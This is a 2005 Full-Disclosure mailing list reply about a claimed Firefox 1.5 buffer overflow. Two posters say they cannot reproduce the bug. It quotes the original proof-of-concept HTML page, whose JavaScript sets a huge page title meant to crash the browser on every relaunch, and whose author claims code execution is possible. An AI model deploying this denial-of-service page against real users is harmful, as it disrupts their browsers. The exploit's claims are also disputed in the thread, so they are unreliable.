[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <43985D2F.9040902@valhallalegends.com>
Date: Thu Dec 8 16:22:01 2005
From: iago at valhallalegends.com (Ron)
Subject: re: Firefox 1.5 buffer overflow (poc)
I was also unable to replicate it, on Firefox 1.5 i386 Linux EN
ad@...poverflow.com wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> nor a fake , nor you really dont know what is a buffer overflow, but for
> sure here on my firefox 1.5 EN, the client is much longuer to load to
> the next boot but it reloads fine without exceptions and there is
> nothing about a security bug here...
>
>
>> <!-- Firefox 1.5 buffer overflow
>>
>> Basically firefox logs all kinda of URL data in it's history.dat file,
>> this little script will set a really large topic and Firefox will then
>> save that topic into it's history.dat.. The next time that firefox is
>> opened, it will instantly crash due to a buffer overflow -- this will
>> happen everytime until you manually delete the history.dat file -- >which
>> most users won't figure out.
>>
>> this proof of concept will only prevent someone from reopening
>> their browser after being exploited. DoS if you will. however, code
>> execution is possible with some modifcations.
>>
>> Tested with Firefox 1.5 on Windows XP SP2.
>>
>> ZIPLOCK <sickbeatz@...il.com>
>>
>> -->
>> <html><head><title>heh</title><script type="text/javascript">
>> function ex() {
>> var buffer = "";
>> for (var i = 0; i < 5000; i++) {
>> buffer += "A";
>> }
>> var buffer2 = buffer;
>> for (i = 0; i < 500; i++) {
>> buffer2 += buffer;
>> }
>> document.title = buffer2;
>> }
>> </script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME
>> </a></body></html>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.2 (MingW32)
>
> iQIVAwUBQ5g3Jq+LRXunxpxfAQIg5RAAsMXisNDN9AcLiWf9F7nsoKhT6uaULAw+
> 4omnQUjuaRvxAIYRwKNC1nC+zl8qzmUsL4Extkd52mn7OkTrprd1MUE09CoshSlX
> Nq9N62bJ4zqRsdrum1NQhc358scTWNKCmWWXtSGNqu4fGnvpljyeYRACGeC6UD/v
> DDbikg09XOO+GffIAf4la63f+SV63+laZ6TkmX2jxBdw1LBN0mMCBLo0IPY5K78m
> /Cu2SCIqvs00ih6olLp9f8/3p9SgiK2+D9UiTnw3F3f2mYR5r7uGilYL9PNQPmKE
> crCnfKCYxi/4P03rnIuja9LNloQWkBTsOhOfe5716NlQ/KZAz/IpfTw7yS6sdn22
> cxUpAE5zQqfI7jI0cD3yozmSksMyyEBLojAtsn2ECFOKpQQgkoOgaQX+dnrT+EYo
> pr2qquUKH/GXHGeT9od57cUkC/Jaf7qcaSkF6/LJ+13yHcsuDH0KcsMCYDP6aGN3
> 5R4/c6MAGFWKblMzdksWe+qqCDgm1yeM7MBbHGYyL6PMnfSldJBD29kGceLc47hi
> AVJaVmmDb3Nc/fo93gmqUT/x+mMItyk8+4dH0HOzEjRfI0qedeD+1uusS97ThVEw
> 2KG1o/1vlLPsnailmtHbj8sj/iawQvQRR/Phvk2Noz8bTQSEkDuThtE+zr2ZEjvb
> IFxjTMn8Sc0=
> =SX09
> -----END PGP SIGNATURE-----
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
Powered by blists - more mailing lists